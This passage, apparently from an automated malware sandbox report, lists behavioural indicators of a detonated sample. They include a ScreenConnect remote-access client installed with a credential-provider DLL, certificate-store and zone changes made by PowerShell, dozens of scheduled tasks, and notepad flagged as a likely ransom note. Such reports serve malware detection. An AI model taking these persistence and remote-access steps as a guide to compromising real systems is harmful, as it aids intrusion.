description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 11632 timeout.exe 9904 timeout.exe 5880 timeout.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 5032 ipconfig.exe -
Kills process with taskkill 2 IoCs
pid Process 13572 taskkill.exe 12252 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\6\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-73a0227d089fe193\shell\open\command msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\5\0 Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-F729-E0B76340D43B}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (73a0227d089fe193)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1027" Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2785182B28319AE42A5CC3A36CD37DD3\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\6\0\NodeSlot = "9" Explorer.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2785182B28319AE42A5CC3A36CD37DD3\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2785182B28319AE42A5CC3A36CD37DD3\SourceList\Media msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 06000000050000000400000003000000020000000100000000000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F69B68EBC5C7E714370A22D780F91E39 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2785182B28319AE42A5CC3A36CD37DD3\SourceList msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-F729-E0B76340D43B} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2785182B28319AE42A5CC3A36CD37DD3\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "46" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" Explorer.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2785182B28319AE42A5CC3A36CD37DD3\Version = "386007049" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).left = "227" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\5\0\NodeSlot = "8" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).y = "4294967295" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\5\0\MRUListEx = ffffffff Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2785182B28319AE42A5CC3A36CD37DD3\ProductName = "ScreenConnect Client (73a0227d089fe193)" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "666" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).x = "4294935296" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294935296" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).left = "250" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1050" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-F729-E0B76340D43B}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-73a0227d089fe193\shell msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).left = "4294967267" Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2785182B28319AE42A5CC3A36CD37DD3 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2785182B28319AE42A5CC3A36CD37DD3\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2785182B28319AE42A5CC3A36CD37DD3\SourceList\PackageName = "setup.msi" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "771" Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-73a0227d089fe193\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (73a0227d089fe193)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-F729-E0B76340D43B}\InprocServer32 msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "66" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Key created \REGISTRY\MACHINE\Software\Classes\sc-73a0227d089fe193\shell\open\command msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 05000000060000000400000003000000020000000100000000000000ffffffff Explorer.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-73a0227d089fe193\UseOriginalUrlEncoding = "1" msiexec.exe -
Opens file in notepad (likely ransom note) 3 IoCs
pid Process 6740 NOTEPAD.EXE 2752 NOTEPAD.EXE 5304 NOTEPAD.EXE -
Runs ping.exe 1 TTPs 17 IoCs
pid Process 12976 PING.EXE 9692 PING.EXE 11312 PING.EXE 12712 PING.EXE 2244 PING.EXE 13724 PING.EXE 14516 PING.EXE 2484 PING.EXE 7000 PING.EXE 8340 PING.EXE 6236 PING.EXE 6436 PING.EXE 11624 PING.EXE 12776 PING.EXE 2492 PING.EXE 14512 PING.EXE 7320 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 46 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4052 schtasks.exe 12008 schtasks.exe 9972 schtasks.exe 12824 schtasks.exe 10120 schtasks.exe 8084 schtasks.exe 14776 schtasks.exe 10504 schtasks.exe 4736 schtasks.exe 788 schtasks.exe 6984 schtasks.exe 15004 schtasks.exe 9324 schtasks.exe 984 schtasks.exe 11744 schtasks.exe 7272 schtasks.exe 10244 schtasks.exe 1720 schtasks.exe 10912 schtasks.exe 2828 schtasks.exe 5580 schtasks.exe 10616 schtasks.exe 7464 schtasks.exe 8196 schtasks.exe 7564 schtasks.exe 14992 schtasks.exe 1048 schtasks.exe 9568 schtasks.exe 11484 schtasks.exe 11792 schtasks.exe 8804 schtasks.exe 8956 schtasks.exe 7484 schtasks.exe 3432 schtasks.exe 10356 schtasks.exe 6492 schtasks.exe 5172 schtasks.exe 9524 schtasks.exe 9420 schtasks.exe 9240 schtasks.exe 12708 schtasks.exe 13356 schtasks.exe 13464 schtasks.exe 12524 schtasks.exe 13200 schtasks.exe 6856 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 8500 ScreenConnect.WindowsClient.exe 11996 ScreenConnect.WindowsClient.exe 11428 first.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe 3044 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3044 taskmgr.exe 3268 Explorer.EXE 13252 discord.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 10896 vbc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
